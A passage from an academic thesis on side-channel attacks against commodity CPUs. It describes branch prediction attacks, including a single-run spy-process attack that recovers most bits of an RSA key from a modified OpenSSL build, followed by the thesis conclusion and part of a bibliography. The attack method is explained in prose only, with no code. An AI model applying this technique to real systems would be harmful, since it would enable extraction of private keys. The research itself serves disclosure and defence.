multiplication. . FIGURE 7.3. Increasing gap between multiplication and squaring steps due to missing BTB entries. As said above, one can deduce very clearly from Figure 7.3 that there is a stabilizing significant cycle difference between multiplication and squaring steps during the exponentiation. Now, that we have verified this BPU-related gap between the successive multiplication and squaring steps during the exponentiation, we want to show now, how simple it is to retrieve the secret key with this attack principle 4. To do this, we simply zoom into the following Figure 7.4 129 with N = 10000 measurements. This yields then the picture on the bottom of Figure 7.4, showing from 89th to 104th montgomery operations for N = 10000 measurements. Once such a sequence of multiplications and squarings is captured, it is a trivial task to translate this sequence to the actual values of the key bits. We would like to remark that the sample size of 10000 measurements might appear quite high at first sight. But using some more sophisticated tricks (which are out of the scope of the present paper) we could have a meaningful square/multiply cycle gap using only a few measurements. 7.3. Conclusions and recommendations for further research Along the theme of the recent research efforts to explore software sidechannels attacks against commodity PC platforms, we have identified the branch prediction capability of modern microprocessors as a new security risk which has not been known so far. Using RSA, the most popular public encryption/signature scheme, and its most popular open source implementation, openSSL, we have shown that there are various attack scenarios how an attacker could exploit a CPU’s branch prediction unit. Also, we have successfully implemented a very powerful attack (Attack 4 = Trace-driven Attack against the BTB which even has the power to break prominent side-channel security mechanisms like those proposed by [52, 105]). The practical results from our experiments should be encouraging to think about efficient and secure software mitigations for this kind of new side-channel attacks. As an interesting countermeasure the following branchless exponentiation method, also known as “atomicity” from [26] comes to our mind. 130 Another interesting research vector might be the idea to apply Branch Prediction Attacks to symmetric ciphers. Although this seems at first sight a bit odd, we would like to point out that an early study of [44] also applied the Timing Attack scenario of Kocher [59] to certain DES implementations and identified branches in the respective DES implementations as a potential source of information leakage. Paired with our improved understanding of branches and their potential information leakage of secrets, it might be a valid idea, to try Branch Prediction Attacks along the ideas of [44]. Similar to other very recent software side-channel attacks against RSA and AES, c.f. [80, 67, 73, 5], our practically simplest attacks rely on a CPU’s Simultaneous Multi-Threading (SMT) capability, c.f. [91]. While SMT seems at first sight a necessary requirement of our asynchronous attacks, we strongly believe that this is just a matter of clever and deeper system’s programming capabilities and that this requirement could be removed along some ideas as mentioned in [48, 73]. Thus, we think it is of highest importance to repeat our asynchronous branch prediction attacks also on non-SMT capable CPU’s. 131 . FIGURE 7.4. Connecting the spy-induced BTB misses and the square/multiply cycle gap. 132 8. ON THE POWER OF SIMPLE BRANCH PREDICTION ANALYSIS Deep CPU pipelines paired with the CPU’s ability to fetch and issue multiple instructions at every machine cycle led to the concept of superscalar processors. Superscalar processors admit a theoretical or best-case performance of less than 1 machine cycle per completed instructions, c.f. [92]. However, the inevitably required branch instructions in the underlying machine languages were very soon recognized as one of the most painful performance killers of superscalar processors. Not surprisingly, CPU architects quickly invented the concept of branch predictors in order to circumvent those performance bottlenecks. Thus, it is not surprising that there has been a vibrant and very practical research on more and more sophisticated branch prediction mechanisms, c.f. [78, 91, 92]. Unfortunately we identify branch prediction as a novel and unforeseen side-channel, thus being another new security threat within the computer security field, c.f. Chapter 7. We just recently discovered that the branch prediction capability, common to all modern high-end CPU’s, is another new side-channel posing a novel and unforeseen security risk. In [1, 7] and Chapter 7, we present different branch prediction attacks on simple RSA implementations as a case study to describe the basics of the novel attacks an adversary can use to compromise the security of a platform. In order to do so, we gradually develop from an obvious attack principle more and more sophisticated attack principles, resulting in four different scenarios. To demonstrate the applicability of these attacks, we complement these scenarios by showing the results of selected practical implementations of various attack scenarios, c.f. Section 7.2. Irrespectively of our achievements, it is obvious that all of these attacks still have the flavor of a classical timing attack against RSA. Indeed, careful ex- 133 amination of these four attacks shows that they all require many measurements to finally reveal the secret key. In a timing attack, the key is obtained by taking many execution time-measurements under the same key in order to statistically amplify some small but key-dependent timing differences, cf. [59, 34, 85]. Thus, simply eliminating the deterministic time-dependency of the RSA signing process of the underlying key by very well understood and also computationally cheap methods like message blinding or secret exponent masking, c.f. [59], such statistical attacks are easy to mitigate. Therefore, it is quite natural that such timing attacks cause no real threat to the security of PC platforms. Unfortunately, our results presented in this chapter teach us that this “let’s think positive and relax” assumption is quite wrong! Namely, we dramatically improve upon the former result of [7] in the following sense. We prove that a carefully written spy-process running simultaneously with an RSA-process is able to collect during one single RSA signing execution almost all of the secret key bits. We call such an attack, analyzing the CPU’s Branch Predictor states through spying on a single quasi-parallel computation process, a Simple Branch Prediction Analysis (SBPA) attack. In order to clearly differentiate those branch prediction attacks that rely on statistical methods and require many computation measurements under the same key, we call those Differential Branch Prediction Analysis (DBPA) attacks. However, additional to that very crucial security implication — SBPA is able to break even such implementations which are assumed to be at least statistically secure — our successful SBPA attack also bears another equally critical security implication. Namely, in the context of simple side-channel attacks, it is widely believed that equally balancing the operations after branches is a secure countermeasure against such simple attacks, c.f. [52]. Unfortunately, this is not 134 true, as even such “balanced branch” implementations can be completely broken by our SBPA attacks. 8.1. Multi-Threading, spy and crypto processes With the advent of the papers from [73, 80] a new and very interesting attack paradigm was initiated. This relies on the massive multi-threading (quasi-parallel) capabilities of modern CPU’s, whether hardware-managed or OSmanaged, c.f. [67]. While purely single-threaded processors run threads/processes serial, the OS manages to execute several programs in a quasi-parallel way, c.f. [93]. The OS basically decomposes an application into a series of short threads that are ordered with other application threads. On the other side, there are also certain processors, so called hardware-assisted multi-threaded CPU’s, which enable a much finer-grained quasi-parallel execution of threads, c.f. [92, 91]. Here, some “cheap” CPU resources are explicitly doubled (tripled, etc.), while some others are temporarily shared. It allows them to have two or many other processes running quasi parallel on the same processor, as if there were two or more logical processors [92, 93]. This allows then indeed a fine-grained instruction-level multi-threading, c.f. [92]. Irrespectively of single-threaded or hardware-assisted multi-threaded, some logical elements are always shared, which enables one process to spy on another process, as the shared CPU elements leak some so called metadata, c.f. [73]. Of course, the sharing of the resources does not allow a direct reading of the other applications data, as the memory protection unit (MMU or Virtual Machine) strictly enforces an application memory separation. One such example of a shared 135 element, which is the central point of interest for this chapter is the highly complex BPU of modern CPU’s. The new paradigm put forward by [73, 80], although already implicitly pointed out by Hu [48], consists of quasi-parallel processes, called spy process and crypto process. As the name suggest, the spy process tries to infer some secret data from the parallel executed crypto process by observing the leaked metadata. In the most extreme and most practical scenario, both processes run completely independently of each other, and this scenario was termed asynchronous attack by [73]. Given the very complex process structures and their handling by a modern OS, cf. [93], the following heuristic is quite obvious. A hardware-assisted multi-threading CPU will simplify a successful spy process, as: 1. Some inevitable “noise” due to the respective thread switches will be absorbed by the CPU’s hardware-assistance. 2. The instruction-level threading capability enhances the time-resolution of the spy-process. In the other case, one needs a very sophisticated OS expertise and a deep thread scheduling expertise, cf. [67]. As the above paradigm and all its subtle implementation details heavily depend on the underlying OS, CPU type and frequency, etc. we will not deepen further those technical details here, and just assume the existence of a suited spy process and a corresponding crypto process in a hardwareassisted multi-threading environment. 136 8.2. Improving Trace-driven Attacks against the BTB In this section, we present our improvement over the DBPA attack from [7], which we outlined in the last section. However, in order to logically derive our final successful SBPA result against some version of the binary square and multiply exponentiation for RSA, we have to investigate the situation a bit deeper. If we consider Figure 7.4, we can certainly draw the conclusion that from spy processes like this, there is no hope for a successful SBPA. At first sight, this looks quite astonishing for the following reason. In a certain sense, the tracedriven attack against the BTB from [7] is similar to the cache eviction attacks of [80, 73, 67]. In these attacks, a spy process is also continuously testing through timing measurements which of its private data had been evicted by the crypto process. And especially in the RSA OpenSSL 9.7 case from [80], the measurement quality was high enough to get lots of secret key bits by spying on one single exponentiation, i.e., inferring by simple time measurements which data the crypto process had loaded into the data cache, to perform the RSA signing operation. However, there is one fundamental difference, setting BPA attacks apart from pure data cache eviction attacks. Attacking the BTB, although being itself acting like a simple cache, is actually targeting the instruction flow, which is magnitudes more complicated than the data flow within the memory hierarchy, i.e., between the L1 data cache and the main memory. Numerous architectural enhancements take care that a deeply pipelined superscalar CPU like Pentium 4 cannot get too easily stalled by a BTB miss. When considering just (and what is publicly known) the Front-End Instruction Pipeline Stages between the Instruction Prefetching Unit and the resulting feeding into the so called µop Queue, as 137 . FIGURE 8.1. Front-End Instruction Pipeline Stages feeding the µop Queue shown in the Figure 8.1 below, we recognize that only this Front-End Instruction path is much more complicated than the data flow path, c.f. [91]. If we inspect the above Figure 8.1 in more depth, we can recognize that the Pentium 4 has two different BTB’s: a Front-End BTB and a Trace-Cache BTB. As the architectural reasons for this second Trace-cache BTB are out of interest for this paper, we refer the interested readers to citeS05:Modern,RBS96:Trace. However, more interesting is the information on their sizes, and especially their joint functionality which we can partially learn from [91, pp. 913-914]: The travels 138 of a conditional branch instruction. The Front-End BTB has a size of 4096 entries, whereas the Trace-Cache BTB has only a size of 512 entries, i.e., the Front-End BTB is a superset of the Trace-Cache BTB. The most interesting fact that we can draw from this doubled BTB is the following. Executing a certain sequence of branches in the spy process which evicts just the Front-End BTB might not necessarily suffice to completely enforce the CPU not to find the target address of the target branch in some of the BTB’s, so that the prediction must be not-taken. A certain hidden interaction between Front-End BTB and Trace-Cache BTB might allow for some “short-term” victim address evictions, but still store the target branch in one of the BTB’s . Thus, we let the spy process continuously do the following. Execute continuously a certain fixed sequence of a number of, say t many, branches to evict the target branch’s entry out of BTB and measure the overall execution time of all these branches. This is exactly what is done in our earlier attack except a single difference, which transforms our trace-driven attack from a DBPA attack into an extremely powerful SBPA attack. The optimal number of t turns out to be significantly larger than the exact number of associativity, which is the value used in our previous attack, c.f. [7] and Chapter 7. The increased value for t guarantees the eviction of the target entry from all different places that can store it, e.g., from both Front-End BTB and Trace-Cache BTB. The value of t also affects the cycle gap between squaring and multiplication in the following way. As mentioned in the previous section, when the target branch is evicted from the BTB and the branch turns out to be taken, then a misprediction will occur and the target address of the branch needs to be stored in BTB. Then, one of the spy branches has to be evicted from the BTB so that the new target 139 address can be stored in. When the spy-process re-executes its branches, it will encounter a misprediction on the branch that has just been evicted. A fact that is not mentioned above is that this misprediction will also trigger further mispredictions since the entry of the evicted spy branch needs to be re-stored and another not-yet-reexecuted spy branch entry has to be evicted, which will also cause other mispredictions. At the end, the execution time of this spy step is expected to suffer from many misprediction delays resulting a high gap between squaring and multiplication. However, this scenario only works out if the entries are completely evicted from all possible locations. As can be seen in Figure 7.4, the gap is only 20 cycles in the previous attack, which indicates that the above scenario is not valid for this particular attack, to be more precise, to this value of t. Increasing t to its optimal value also enforces our scenario and guarantees a very large gap composed of several misprediction delays. This fact is clear considering the gap around 1000 cycles in our SBPA attack, i.e. improved trace-driven attack. The optimal value of t is eventually machine dependent and (most likely) also depends on the particular set of software, i.e. OS, running on the machine. Therefore, an adversary needs to tune, e.g. empirically determine the optimal t value, the spy process on the attack machine. 8.3. Practical Results To validate our aforementioned enhanced “BTB eviction strategy”, we performed some practical experiments. As usual in this context, we have chosen to carry out our experimental attacks in a popular simultaneous multithreading environment, c.f. [91], as this CPU type simplifies the context switching between 140 the spy and the crypto process. In our above outlined setting, the adversary can apply this asynchronous attack without any knowledge on the details of the used branch prediction algorithm or any deeper BTB structure knowledge. As in our previous Branch Prediction attacks, we performed this attack on a very simple RSA implementation that employed a square-and-multiply exponentiation and also Montgomery multiplication with dummy reduction. We used the RSA implementation from OpenSSL version 0.9.7e as a template and made some modifications to convert this implementation into the simple one as stated above. To be more precise, we changed the window size from 5 to 1, removed the CRT mode, and added the dummy reduction step. We used random plaintexts generated by the rand() and srand() functions, as available in the standard C library, and measured the execution time in terms of clock cycles using the cycle counter instruction RDTSC, which is available in user-level. An experimental results of this enhanced “BTB eviction strategy” for RSAsign with a 512 bit key-length are shown in the following Figure 8.2. As recognizable from the above Figure 8.2, our repeated spy-execution of a certain fixed sequence of branches certainly enhanced the resolution for one single RSA-sign measurement. Indeed, comparing Figure 8.2 with Figure 7.4 we can say that this simple trick “saved” an averaging of about 1000 to 10000 different measurements. However, although the results shown in Figure 8.2 weaken the strength of the key tremendously, they do not give us enough information to break the RSA key easily. On an average PC (client or server) running Windows, Linux, etc. there are many quasi-parallel processes running, whether system-processes or user-initiated processes. The time when such processes are running can be assumed to be random and it heavily influences the timing-behavior of every other process, for 141 . FIGURE 8.2. Results of SBPA with an improved resolution. 142 e.g., our spy and crypto process. Therefore, there is a statistical chance to perform some of our measurements during a timeframe when such influences are minimal, which leads us to our following heuristic: there must exist among all those measurements also some quite “clear” measurements. We call this argument the time-dependent random self-improvement heuristic. Applying this heuristic simply means that we just have to do some SBPA measurements, say at several independent times, and we can be sure that among those there will be at least “one unusually good” individual measurement, which will be our final SBPA. To validate this heuristic, we performed then ten different “random” SBPA attacks on the same 512 bit key. The results are given in Figure 8.3. Without doubt, there are quite different results among them although they process the same key, thus supporting our heuristic quite well. And indeed, the following experimental result, also being among those ten measurements, clearly shows that there is one exceptionally clear one, which directly reveals almost all of the secret key bits. Armed with this final experimental result, we safely can claim that we have lifted our work of [7] to the much more powerful SBPA area. 8.4. Conclusions Branch Prediction Analysis (BPA), which recently led to a new software side-channel attack, still had the flavor of classical timing attacks against RSA. Timing attacks use many execution-time measurements under the same key in order to statistically amplify some small but key-dependent timing differences. We have dramatically improved our former results presented in [7, 1] and the previous 143 . FIGURE 8.3. Enhancing a bad resolution via independent repetition. 144 . FIGURE 8.4. Best result of our SBPA against openSSL RSA, yielding 508 out of 512 secret key bits. 145 chapter and showed that a carefully written spy-process running simultaneously with an RSA-process, is able to collect during one single RSA signing execution almost all of the secret key bits. We call this attack, analyzing the CPU’s Branch Predictor states through spying on a single quasi-parallel computation process, a Simple Branch Prediction Analysis (SBPA) attack — sharply differentiating it from those one relying on statistical methods and requiring many computation measurements under the same key. The successful extraction of almost all secret key bits by our SBPA attack against an OpenSSL RSA implementation proves that the often recommended blinding or so called randomization techniques to protect RSA against side-channel attacks are, in the context of SBPA attacks, totally useless. Additional to that very crucial security implication, targeted at such implementations which are assumed to be at least statistically secure, our successful SBPA attack also bears another equally critical security implication. Namely, in the context of simple side-channel attacks, it is widely believed that equally balancing the operations after branches is a secure countermeasure against such simple attacks. Unfortunately, this is not true, as even such “balanced branch” implementations can be completely broken by our SBPA attacks. Moreover, despite sophisticated hardware-assisted partitioning methods such as memory protection, sandboxing or even virtualization, SBPA attacks empower an unprivileged process to successfully attack other processes running in parallel on the same processor. Thus, we conclude that SBPA attacks are much more dangerous than previously anticipated, as they obviously do not belong to the same category as pure timing attacks. More importantly, since our new attack requires only one single execution observation, and thus significantly differs from the earlier timing attacks, the SBPA discovery opens new and very interesting application areas. It espe- 146 cially endangers those cryptographic/algorithmic primitives, whose nature is an intrinsic and input dependent branching process. Here, we especially target the modular reduction and the modular inversion part. In practical implementations of popular cryptosystems, they are often used in such cases, where one parameter of the respective algorithm (i.e., modular reduction or modular inversion) is an important secret parameter of the underlying cryptosystem. Let us briefly mention a few but important situations for reduction and inversion, where a successful SBPA attack can lead to a serious security compromise. • Modular reduction (mod p and mod q) is used in the initial normalization process of RSA when using the Chinese Remainder Theorem, c.f. [64]. And indeed, [51, 53] already pointed out that the classical pencil and paper division algorithm could leak through certain side channels the secret knowledge of p and q. • Inversion is also very often used as a statistical side channel attack countermeasure to blind messages during RSA signature computations, cf. [59, 85], thus effectively combating classical timing attacks, cf. [21]. • Inversion is the main ingredient during the RSA key generation set-up to compute the secret exponent from the public exponent and the totient function of the respective RSA modulus. • Inversion is also used in the (EC)DSA, cf. [64], and just the leakage of a few secret bits of the respective ephemeral keys, cf. [47, 69, 70], leads to a total break of the (EC)DSA. Classical timing attacks cannot compromise such operations solely because they rely on capturing many measurements and statistical analysis with the same 147 input parameters, whereas the above situations execute the reduction or inversion part only once for a specific input set. We feel that our findings will eventually result in a serious revision of current software for various public-key cryptosystem implementations, and that there will arise a new research vector along our results. 148 9. CONCLUSION Side-channel cryptanalysis has attracted significant attention since Kocher’s discoveries of timing and power analysis attacks [59, 60]. The classical cryptography, which analyzes the cryptosystems as perfect mathematical objects and ignores the physical analysis of the implementations, fails to identify sidechannel leakages. Therefore it is inevitable to utilize both classical cryptography and side-channel cryptanalysis in order to develop and implement secure systems. The initial focus of side-channel research was on smart card security. Smart cards are used for identification or financial transactions and therefore need builtin security features. They store secret values inside the card and they are especially designed to protect and process these secret values. The recent promises from Trusted Computing community indicate the security assurance of storing such secret values in PC platforms, c.f. [99]. These promises have made the side-channel analysis of PC platforms as desirable as that of smart cards. We have seen an increased research effort on the security analysis of the daily life PC platforms from the side-channel point of view. Here, it has been especially shown that the functionality of the common components of processor architectures creates an indisputable security risk, c.f. [1, 2, 5, 14, 73, 80], which comes in different forms. Although the cache itself has been known for a long time being a crucial security risk of modern CPU’s, c.f. [95, 48], [5, 14, 73, 80] were the first proving such vulnerabilities practically and raised large public interest in such vulnerabilities. These advances initiated a new research vector to identify, analyze, and mitigate the security vulnerabilities that are created by the design and implementation of processor components. 149 Especially in the light of ongoing Trusted Computing efforts, c.f. [99], which promise to turn the commodity PC platform into a trustworthy platform, c.f. also [25, 35, 42, 79, 99, 103], the formerly described side channel attacks against PC platforms have significant importance. This is due to the fact that side channel attacks have been completely ignored by the Trusted Computing community so far. Even more interesting is the fact that all of the above pure software side channel attacks also allow a totally unprivileged process to attack other processes running in parallel on the same processor (or even remote), despite sophisticated partitioning methods such as memory protection, sandboxing or even virtualization. This particularly means that side channel attacks render all of the sophisticated protection mechanisms as for (e.g.) described in [42, 103] as useless. The simple reason for the failure of these trust mechanisms is that the new side-channel attacks simply exploit deeper processor ingredients that are below the trust architecture boundary, c.f. [81, 42]. In this thesis, we have focused on side-channel cryptanalysis of cryptosystems on commodity computer platforms. Especially, we have analyzed two main CPU components, cache and branch prediction unit, from side-channel point of view. We have shown that the functionalities of these two components create v ery serious security risks in software systems, especially in software based cryptosystems. We have presented the first realistic remote attack on computer systems, which was developed by Brumley et al. [21], and proposed an improved version of this original attack. Our proposals improve the efficiency of this attack by a factor of more than 10. 150 Then we have presented current cache attacks in the literature to give the reader a brief overview of the area. We also have introduced a new cache timing attack on AES that can compromise remote systems. None of the cache attack works could achieve the ultimate goal of devising a realistic remote attack. We have discussed how one can devise and apply such a remote cache attack. We have presented those ideas in Chapter 5 and showed how to use them to develop a universal remote cache attack on AES. Our results prove that cache attacks cannot be considered as pure local attacks and they can be applied to software systems running over a network. We have also analyzed trace-driven cache attacks, which are one of three types of cache attacks identified so far. We have constructed an analytical model for trace-driven attacks that enables one to analyze such attacks on different implementations and different platforms, c.f. Chapter 6. We have developed very efficient trace-driven attacks on AES and applied our model on those attacks as a case study. Furthermore, we have identified branch prediction units of modern computer systems as yet another unforeseen security risk even in the presence of recent security promises for commodity platforms from the Trusted Computing area. We have developed various attack techniques that rely on the functionality of branch prediction units. We have showed that those attacks can practically extract the secrets of public-key cryptosystems. Moreover, we have showed that a carefully written spy-process running simultaneously with an RSA-process, is able to collect during one single RSA signing execution almost all of the secret key bits. We call this attack, analyzing the CPU’s Branch Predictor states through spying on a single quasi-parallel computation process, a Simple Branch Prediction Analysis (SBPA) attack — sharply 151 differentiating it from those one relying on statistical methods and requiring many computation measurements under the same key. The successful extraction of almost all secret key bits by our SBPA attack against an OpenSSL RSA implementation proves that the often recommended blinding or so called randomization techniques to protect RSA against side-channel attacks are, in the context of SBPA attacks, totally useless. Additional to that very crucial security implication, targeted at such implementations which are assumed to be at least statistically secure, our successful branch prediction attacks also bear another equally critical security implication. Namely, in the context of simple side-channel attacks, it is widely believed that equally balancing the operations after branches is a secure countermeasure against such simple attacks. Unfortunately, this is not true, as even such “balanced branch” implementations can be completely broken by our attacks. Moreover, despite sophisticated hardware-assisted partitioning methods such as memory protection, sandboxing or even virtualization, SBPA attacks empower an unprivileged process to successfully attack other processes running in parallel on the same processor. Thus, we conclude that branch prediction attacks are extremely dangerous, as they obviously do not belong to the same category as pure timing attacks. More importantly, since our new attack requires only one single execution observation, and thus significantly differs from the earlier timing attacks, the SBPA discovery opens new and very interesting application areas. It especially endangers those cryptographic/algorithmic primitives, whose nature is an intrinsic and input dependent branching process. Here, we especially target the modular reduction and the modular inversion part. In practical implementations of popular cryptosystems, they are often used in such cases, where one parameter 152 of the respective algorithm (i.e., modular reduction or modular inversion) is an important secret parameter of the underlying cryptosystem. The potential cache based security vulnerabilities have been known for a long time, even though actual cache attacks were not implemented until recently. There are many countermeasures that were proposed to prevent cache attacks before 2005. However, there is not any hint in the literature pointing branch prediction out as a potential side channel attack source. As a consequent of this, there was not any effort to develop mitigation methods against branch prediction attacks. Eventually, we have developed several mitigations against this particular security vulnerability. Branch prediction attacks also compromise secure systems even in the presence of sophisticated partitioning techniques like memory protection and virtualization. Therefore it is crucial and inevitable to employ mitigation methods against the vulnerabilities we had identified in order to achieve the promises of security critical technologies like virtualization. We believe that our findings presented in this thesis will eventually result in a serious revision of current software for various cryptosystem implementations, and that there will arise new research vectors along our results. 153 BIBLIOGRAPHY [1] O. Acıiçmez, Ç. K. Koç, and J.-P. Seifert. Predicting Secret Keys via Branch Prediction. Topics in Cryptology — CT-RSA 2007, The Cryptographers’ Track at the RSA Conference 2007, M. Abe, editor, pages 225-242, SpringerVerlag, Lecture Notes in Computer Science series 4377, 2007. [2] O. Acıiçmez, Ç. K. Koç, and J.-P. Seifert. On The Power of Simple Branch Prediction Analysis. Cryptology ePrint Archive, Report 2006/351, October 2006. [3] O. Acıiçmez and Ç. K. Koç. Trace-Driven Cache Attacks on AES. Cryptology ePrint Archive, Report 2006/138, April 2006. [4] O. Acıiçmez and Ç. K. Koç. Trace-Driven Cache Attacks on AES (Short Paper). 8th International Conference on Information and Communications Security — ICICS06, P. Ning, S. Qing, and N. Li, editors, pages 112-121, Springer-Verlag, Lecture Notes in Computer Science series 4307, 2006. [5] O. Acıiçmez, W. Schindler, and Ç. K. Koç. Cache Based Remote Timing Attack on the AES. Topics in Cryptology — CT-RSA 2007, The Cryptographers’ Track at the RSA Conference 2007, M. Abe, editor, pages 271-286, Springer-Verlag, Lecture Notes in Computer Science series 4377, 2007. [6] O. Acıiçmez, W. Schindler, Ç. K. Koç. Improving Brumley and Boneh Timing Attack on Unprotected SSL Implementations. Proceedings of the 12th ACM Conference on Computer and Communications Security, C. Meadows and P. Syverson, editors, pages 139-146, ACM Press, 2005. [7] O. Acıiçmez, J.-P. Seifert, and Ç. K. Koç. Predicting Secret Keys via Branch Prediction. Cryptology ePrint Archive, Report 2006/288, August 2006. [8] Advanced Encryption Standard (AES). Federal Information Processing Standards Publication 197, 2001. Available at http://csrc.nist.gov/publications/fips/fips197/fips-197.pdf [9] AES Lounge. http://www.iaik.tugraz.at/research/krypto/AES/ [10] D. Agrawal, B. Archambeault, J. R. Rao, P. Rohatgi. The EM SideChannel(s). Cryptographic Hardware and Embedded Systems — CHES 2002, B. S. Kaliski, Ç. K. Koç, and C. Paar, editors, pages 29-45, Springer-Verlag, Lecture Notes in Computer Science series 2523, 2003. [11] T. Austin, E. Larson, and D. Ernst. SimpleScalar: an infrastructure for computer system modeling. IEEE Computer, volume 35, issue 2, pages 5967, February 2002. 154 [12] M. Bellare and P. Rogaway. Optimal asymmetric encryption — How to encrypt with RSA. Advances in Cryptology - EUROCRYPT ’94, Lecture Notes in Computer Science, volume 950, Springer-Verlag, 1995, pp. 92-111. [13] D. E. Bell and L. La Padula. Secure Computer Systems: Mathematical Foundations and Model. Technical Report M74-244, MITRE Corporation, 1973. [14] D. J. Bernstein. Cache-timing attacks on AES. Technical Report, 37 pages, April 2005. Available at: http://cr.yp.to/antiforgery/cachetiming-20050414.pdf [15] G. Bertoni, V. Zaccaria, L. Breveglieri, M. Monchiero, G. Palermo. AES Power Attack Based on Induced Cache Miss and Countermeasure. International Symposium on Information Technology: Coding and Computing ITCC 2005, volume 1, pages 4-6, 2005. [16] D. Bleichenbacher. Chosen Ciphertext Attacks Against Protocols Based on the RSA Encryption Standard PKCS #1. Advances in Cryptology CRYPTO ’98, H. Krawczyk, editor, pages 1-12, Springer-Verlag, Lecture Notes in Computer Science series 1462, 1998. [17] D. Boneh. Twenty years of attacks on the RSA cryptosystem. Notices of the American Mathematical Society, volume 46, pp. 203-213, 1999. Available at: http://www.ams.org/notices/199902/boneh.pdf [18] J. Bonneau and I. Mironov. Cache-Collision Timing Attacks against AES. Cryptographic Hardware and Embedded Systems — CHES 2006, L. Goubin and M. Matsui, editors, pages 201-215, Springer-Verlag, Lecture Notes in Computer Science series 4249, 2006. [19] E. Brickell, G. Graunke, M. Neve, J.-P. Seifert. Software mitigations to hedge AES against cache-based software side channel vulnerabilities. Cryptology ePrint Archive, Report 2006/052, February 2006. [20] R. H. Brown, M. L. Good, A. Prabhakar. Data Encryption Standard (DES) (FIPS 46-2). Federal Information Processing Standards Publication (FIPS), Dec 1993. Available at: http://www.itl.nist.gov/fipspubs/fip46-2.html (initial version from Jan 15, 1977). [21] D. Brumley and D. Boneh. Remote Timing Attacks are Practical. Proceedings of the 12th Usenix Security Symposium, pages 1-14, 2003. [22] D. Burger, T. M. Austin, and S. Bennett. Evaluating future microprocessors: The simplescalar tool set. Technical Report CS-TR-1996-1308, 1996. 155 [23] B. Canvel, A. Hiltgen, S. Vaudenay, M. Vuagnoux. Password Interception in a SSL/TSL Channel. Advances in Cryptology - CRYPTO ’03, D. Boneh, editor, pages 583-599, Springer-Verlag, Lecture Notes in Computer Science series 2729, 2003. [24] S. Chari, J. R. Rao, P. Rohatgi. Template Attacks. Cryptographic Hardware and Embedded Systems — CHES 2002, B. S. Kaliski Jr, Ç. K. Koç, and C. Paar, editors, pages 13-28, Springer-Verlag, Lecture Notes in Computer Science series 2523, 2003. [25] Y. Chen, P. England, M. Peinado, and B. Willman. High Assurance Computing on Open Hardware Architectures. Technical Report, MSR-TR-2003-20, 17 pages, Microsoft Corporation, March 2003. Available at: ftp://ftp.research.microsoft.com/pub/tr/tr-2003-20.ps [26] B. Chevallier-Mames, M. Ciet, and M. Joye. Low-cost solutions for preventing simple side-channel analysis: side-channel atomicity. IEEE Transactions on Computers, volume 53, issue 6, pages 760-768, June 2004. [27] D. Coppersmith. Small Solutions to Polynomial Equations, and Low Exponent RSA Vulnerabilities. Journal of Cryptology, volume 10, issue 4, pages 233-260, 1997. [28] J.-S. Coron, D. Naccache, and P. Kocher. Statistics and Secret Leakage. ACM Transactions on Embedded Computing Systems, volume 3, issue 3, pages 492-508, August 2004. [29] S. C. Coutinho. The Mathematics of Ciphers: Number Theory and RSA Cryptography. AK Peters, 1998. [30] Cryptographic Key Length http://www.keylength.com Recommendation. Available at: [31] J. Daemen, V. Rijmen. The Design of Rijndael: AES - The Advanced Encryption Standard. Springer-Verlag, 2002. [32] Department of Defence. Trusted Computing System Evaluation Criteria (Orange Book). DoD 5200.28-STD, 1985. [33] R. C. Detmer. Introduction to 80X86 Assembly Language and Computer Architecture. Jones & Bartlett Publishers, 2001. [34] J.-F. Dhem, F. Koeune, P.-A. Leroux, P.-A. Mestré, J.-J. Quisquater, J.-L. Willems. A Practical Implementation of the Timing Attack. Smart Card – Research and Applications, J.-J. Quisquater and B. Schneier, editors, pages 156 175-191, Springer-Verlag, Lecture Notes in Computer Science series 1820, 2000. [35] P. England, B. Lampson, J. Manferdelli, M. Peinado, and B. Willman. A Trusted Open Platform. IEEE Computer, volume 36, issue 7, pages 55-62, July 2003. [36] W. Feller. Introduction to Probability Theory and Its Applications (Volume 1). 3rd edition, revised printing, New York, Wiley, 1970. [37] K. Gandolfi, C. Mourtel, F. Olivier. Electromagnetic Analysis: Concrete Results. Cryptographic Hardware and Embedded Systems — CHES 2001, Ç. K. Koç, D. Naccache, and C. Paar, editors, pages 251-261, Springer-Verlag, Lecture Notes in Computer Science series 2162, 2001. [38] P. Gänssler, W. Stute: Wahrscheinlichkeitstheorie. Springer, Berlin 1977. [39] P. Genua. A Cache Primer. Technical Report, Freescale Semiconductor Inc., 16 pages, 2004. Available at: http://www.freescale.com/files/32bit/doc/app note/AN2663.pdf [40] GNU Project: GMP: http://www.swox.com/gmp/. [41] S. Gochman, R. Ronen, I. Anati, A. Berkovits, T. Kurts, A. Naveh, A. Saeed, Z. Sperber, and R. Valentine. The Intel Pentium M Processor: Microarchitecture and performance. Intel Technology Journal, volume 7, issue 2, May 2003. [42] D. Grawrock. The Intel Safer Computing Initiative: Building Blocks for Trusted Computing, Intel Press, 2006. [43] J. Handy. The Cache Memory Book. 2nd edition, Morgan Kaufmann, 1998. [44] A. Hevia and M. Kiwi. Strength of Two Data Encryption Standard Implementations under Timing Attacks. ACM Transactions on Information and System Security — TISSEC, volume 4, issue 2, pages 416-437, November 1999. [45] F. H. Hinsley, A. Stripp. Code Breakers Oxford University Press, 1993. [46] History of Computer Security Project: Early Papers. National Institute of Standards and Technology (NIST), Computer Security Division: Computer Security Resource Center. Available at: http://csrc.nist.gov/publications/history/index.html 157 [47] N. A. Howgrave-Graham and N. P. Smart. Lattice Attacks on Digital Signature Schemes. Design, Codes and Cryptography, Volume 23, pages 283-290, 2001. [48] W. M. Hu. Lattice scheduling and covert channels. Proceedings of the IEEE Symposium on Security and Privacy, pages 52-61, IEEE Computer Society, 1992. [49] M. Joye and P. Paillier. How to Use RSA; or How to Improve the Efficiency of RSA without Loosing its Security. ISSE 2002, U. Schulte, Ed., Paris, France, October 2–4, 2002 [50] M. Joye, J.-J. Quisquater, and T. Takagi. How to Choose Secret Parameters for RSA-Type Cryptosystems over Elliptic Curves. Designs, Codes and Cryptography, volume 23, issue 3, pages 297-316, 2001. [51] M. Joye and K. Villegas. A protected division algorithm. Smart Card Research and Advanced Applications — CARDIS 2002, P. Honeyman, editor, pages 69-74, Usenix Association, 2002. [52] M. Joye and S.-M. Yen. The Montgomery powering ladder. Cryptographic Hardware and Embedded Systems — CHES 2002, B. S. Kaliski Jr, Ç. K. Koç, and C. Paar, editors, pages 291-302, Springer-Verlag, Lecture Notes in Computer Science series 2523, 2003. [53] H. Kahl. SPA-based attack against the modular reduction within a partially secured RSA-CRT implementation. Cryptology ePrint Archive, Report 2004/197, 2004. [54] J. Kelsey, B. Schneier, D. Wagner, C. Hall. Side 